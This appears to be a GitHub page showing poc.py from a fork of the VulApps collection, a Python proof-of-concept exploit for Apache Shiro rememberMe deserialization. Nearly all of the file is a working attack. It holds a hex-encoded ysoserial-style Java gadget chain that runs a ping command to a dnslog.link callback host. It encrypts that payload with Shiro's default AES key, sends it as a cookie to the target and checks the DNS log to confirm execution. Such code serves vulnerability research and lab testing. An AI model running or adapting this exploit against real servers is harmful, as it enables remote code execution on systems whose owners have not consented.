forked from p01ice/VulApps
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathpoc.py
44 lines (38 loc) · 8.44 KB
/
poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#!/usr/bin/env python
# coding:utf-8
import time
import base64
import uuid
import requests
import random
import binascii
from Crypto.Cipher import AES
def poc(url):
if '://' not in url:
target = 'https://%s' % url if ':443' in url else 'http://%s' % url
else:
target = url
try:
numint = random.randint(1000, 9999)
payload = generator(numint)
requests.get(target, cookies={'rememberMe': payload.decode()}, timeout=10)
time.sleep(3)
resp = requests.get("http://admin.dnslog.link/api/dns/test/test/")
if "%s.shiro" % (str(numint)) in resp.content:
print "[+] %s is vulnerable." % (url)
return True
except:
pass
return False
def generator(numint):
payload = "ACED0005 73720017 6A617661 2E757469 6C2E5072 696F7269 74795175 65756594 DA30B4FB 3F82B103 00024900 0473697A 654C000A 636F6D70 61726174 6F727400 164C6A61 76612F75 74696C2F 436F6D70 61726174 6F723B78 70000000 02737200 426F7267 2E617061 6368652E 636F6D6D 6F6E732E 636F6C6C 65637469 6F6E7334 2E636F6D 70617261 746F7273 2E547261 6E73666F 726D696E 67436F6D 70617261 746F722F F984F02B B108CC02 00024C00 09646563 6F726174 65647100 7E00014C 000B7472 616E7366 6F726D65 7274002D 4C6F7267 2F617061 6368652F 636F6D6D 6F6E732F 636F6C6C 65637469 6F6E7334 2F547261 6E73666F 726D6572 3B787073 7200406F 72672E61 70616368 652E636F 6D6D6F6E 732E636F 6C6C6563 74696F6E 73342E63 6F6D7061 7261746F 72732E43 6F6D7061 7261626C 65436F6D 70617261 746F72FB F49925B8 6EB13702 00007870 7372003B 6F72672E 61706163 68652E63 6F6D6D6F 6E732E63 6F6C6C65 6374696F 6E73342E 66756E63 746F7273 2E496E76 6F6B6572 5472616E 73666F72 6D657287 E8FF6B7B 7CCE3802 00035B00 05694172 67737400 135B4C6A 6176612F 6C616E67 2F4F626A 6563743B 4C000B69 4D657468 6F644E61 6D657400 124C6A61 76612F6C 616E672F 53747269 6E673B5B 000B6950 6172616D 54797065 73740012 5B4C6A61 76612F6C 616E672F 436C6173 733B7870 75720013 5B4C6A61 76612E6C 616E672E 4F626A65 63743B90 CE589F10 73296C02 00007870 00000000 74000E6E 65775472 616E7366 6F726D65 72757200 125B4C6A 6176612E 6C616E67 2E436C61 73733BAB 16D7AECB CD5A9902 00007870 00000000 77040000 00037372 003A636F 6D2E7375 6E2E6F72 672E6170 61636865 2E78616C 616E2E69 6E746572 6E616C2E 78736C74 632E7472 61782E54 656D706C 61746573 496D706C 09574FC1 6EACAB33 03000949 000D5F69 6E64656E 744E756D 62657249 000E5F74 72616E73 6C657449 6E646578 5A00155F 75736553 65727669 6365734D 65636861 6E69736D 4C00195F 61636365 73734578 7465726E 616C5374 796C6573 68656574 71007E00 0A4C000B 5F617578 436C6173 73657374 003B4C63 6F6D2F73 756E2F6F 72672F61 70616368 652F7861 6C616E2F 696E7465 726E616C 2F78736C 74632F72 756E7469 6D652F48 61736874 61626C65 3B5B000A 5F627974 65636F64 65737400 035B5B42 5B00065F 636C6173 7371007E 000B4C00 055F6E61 6D657100 7E000A4C 00115F6F 75747075 7450726F 70657274 69657374 00164C6A 6176612F 7574696C 2F50726F 70657274 6965733B 78700000 0000FFFF FFFF0074 0003616C 6C707572 00035B5B 424BFD19 156767DB 37020000 78700000 00027572 00025B42 ACF317F8 060854E0 02000078 70000006 A2CAFEBA BE000000 3100380A 00030022 07003607 00250700 26010010 73657269 616C5665 7273696F 6E554944 0100014A 01000D43 6F6E7374 616E7456 616C7565 05AD2093 F391DDEF 3E010006 3C696E69 743E0100 03282956 01000443 6F646501 000F4C69 6E654E75 6D626572 5461626C 65010012 4C6F6361 6C566172 6961626C 65546162 6C650100 04746869 73010013 53747562 5472616E 736C6574 5061796C 6F616401 000C496E 6E657243 6C617373 65730100 354C7973 6F736572 69616C2F 7061796C 6F616473 2F757469 6C2F4761 64676574 73245374 75625472 616E736C 65745061 796C6F61 643B0100 09747261 6E73666F 726D0100 72284C63 6F6D2F73 756E2F6F 72672F61 70616368 652F7861 6C616E2F 696E7465 726E616C 2F78736C 74632F44 4F4D3B5B 4C636F6D 2F73756E 2F6F7267 2F617061 6368652F 786D6C2F 696E7465 726E616C 2F736572 69616C69 7A65722F 53657269 616C697A 6174696F 6E48616E 646C6572 3B295601 0008646F 63756D65 6E740100 2D4C636F 6D2F7375 6E2F6F72 672F6170 61636865 2F78616C 616E2F69 6E746572 6E616C2F 78736C74 632F444F 4D3B0100 0868616E 646C6572 73010042 5B4C636F 6D2F7375 6E2F6F72 672F6170 61636865 2F786D6C 2F696E74 65726E61 6C2F7365 7269616C 697A6572 2F536572 69616C69 7A617469 6F6E4861 6E646C65 723B0100 0A457863 65707469 6F6E7307 00270100 A6284C63 6F6D2F73 756E2F6F 72672F61 70616368 652F7861 6C616E2F 696E7465 726E616C 2F78736C 74632F44 4F4D3B4C 636F6D2F 73756E2F 6F72672F 61706163 68652F78 6D6C2F69 6E746572 6E616C2F 64746D2F 44544D41 78697349 74657261 746F723B 4C636F6D 2F73756E 2F6F7267 2F617061 6368652F 786D6C2F 696E7465 726E616C 2F736572 69616C69 7A65722F 53657269 616C697A 6174696F 6E48616E 646C6572 3B295601 00086974 65726174 6F720100 354C636F 6D2F7375 6E2F6F72 672F6170 61636865 2F786D6C 2F696E74 65726E61 6C2F6474 6D2F4454 4D417869 73497465 7261746F 723B0100 0768616E 646C6572 0100414C 636F6D2F 73756E2F 6F72672F 61706163 68652F78 6D6C2F69 6E746572 6E616C2F 73657269 616C697A 65722F53 65726961 6C697A61 74696F6E 48616E64 6C65723B 01000A53 6F757263 6546696C 6501000C 47616467 6574732E 6A617661 0C000A00 0B070028 01003379 736F7365 7269616C 2F706179 6C6F6164 732F7574 696C2F47 61646765 74732453 74756254 72616E73 6C657450 61796C6F 61640100 40636F6D 2F73756E 2F6F7267 2F617061 6368652F 78616C61 6E2F696E 7465726E 616C2F78 736C7463 2F72756E 74696D65 2F416273 74726163 74547261 6E736C65 74010014 6A617661 2F696F2F 53657269 616C697A 61626C65 01003963 6F6D2F73 756E2F6F 72672F61 70616368 652F7861 6C616E2F 696E7465 726E616C 2F78736C 74632F54 72616E73 6C657445 78636570 74696F6E 01001F79 736F7365 7269616C 2F706179 6C6F6164 732F7574 696C2F47 61646765 74730100 083C636C 696E6974 3E010011 6A617661 2F6C616E 672F5275 6E74696D 6507002A 01000A67 65745275 6E74696D 65010015 28294C6A 6176612F 6C616E67 2F52756E 74696D65 3B0C002C 002D0A00 2B002E01 00257069 6E67202D 63203320 {numint} 2E736869 726F2E74 6573742E 646E736C 6F672E6C 696E6B08 00300100 04657865 63010027 284C6A61 76612F6C 616E672F 53747269 6E673B29 4C6A6176 612F6C61 6E672F50 726F6365 73733B0C 00320033 0A002B00 3401001E 79736F73 65726961 6C2F5077 6E657235 35303139 30393134 31373635 39390100 204C7973 6F736572 69616C2F 50776E65 72353530 31393039 31343137 36353939 3B002100 02000300 01000400 01001A00 05000600 01000700 00000200 08000400 01000A00 0B000100 0C000000 2F000100 01000000 052AB700 01B10000 0002000D 00000006 00010000 002E000E 0000000C 00010000 0005000F 00370000 00010013 00140002 000C0000 003F0000 00030000 0001B100 00000200 0D000000 06000100 00003300 0E000000 20000300 00000100 0F003700 00000000 01001500 16000100 00000100 17001800 02001900 00000400 01001A00 01001300 1B000200 0C000000 49000000 04000000 01B10000 0002000D 00000006 00010000 0037000E 0000002A 00040000 0001000F 00370000 00000001 00150016 00010000 0001001C 001D0002 00000001 001E001F 00030019 00000004 0001001A 00080029 000B0001 000C0000 001B0003 00020000 000FA700 03014CB8 002F1231 B6003557 B1000000 00000200 20000000 02002100 11000000 0A000100 02002300 10000975 71007E00 1A000001 D4CAFEBA BE000000 31001B0A 00030015 07001707 00180700 19010010 73657269 616C5665 7273696F 6E554944 0100014A 01000D43 6F6E7374 616E7456 616C7565 0571E669 EE3C6D47 18010006 3C696E69 743E0100 03282956 01000443 6F646501 000F4C69 6E654E75 6D626572 5461626C 65010012 4C6F6361 6C566172 6961626C 65546162 6C650100 04746869 73010003 466F6F01 000C496E 6E657243 6C617373 65730100 254C7973 6F736572 69616C2F 7061796C 6F616473 2F757469 6C2F4761 64676574 7324466F 6F3B0100 0A536F75 72636546 696C6501 000C4761 64676574 732E6A61 76610C00 0A000B07 001A0100 2379736F 73657269 616C2F70 61796C6F 6164732F 7574696C 2F476164 67657473 24466F6F 0100106A 6176612F 6C616E67 2F4F626A 65637401 00146A61 76612F69 6F2F5365 7269616C 697A6162 6C650100 1F79736F 73657269 616C2F70 61796C6F 6164732F 7574696C 2F476164 67657473 00210002 00030001 00040001 001A0005 00060001 00070000 00020008 00010001 000A000B 0001000C 0000002F 00010001 00000005 2AB70001 B1000000 02000D00 00000600 01000000 3B000E00 00000C00 01000000 05000F00 12000000 02001300 00000200 14001100 00000A00 01000200 16001000 09707400 0450776E 72707701 00787372 00116A61 76612E6C 616E672E 496E7465 67657212 E2A0A4F7 81873802 00014900 0576616C 75657872 00106A61 76612E6C 616E672E 4E756D62 657286AC 951D0B94 E08B0200 00787000 00000178".format(numint=binascii.b2a_hex(str(numint))).replace(' ', '').decode('hex')
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "kPH+bIxk5D2deZiIxcaaaA=="
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(payload)
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
poc("http://127.0.0.1:9000/")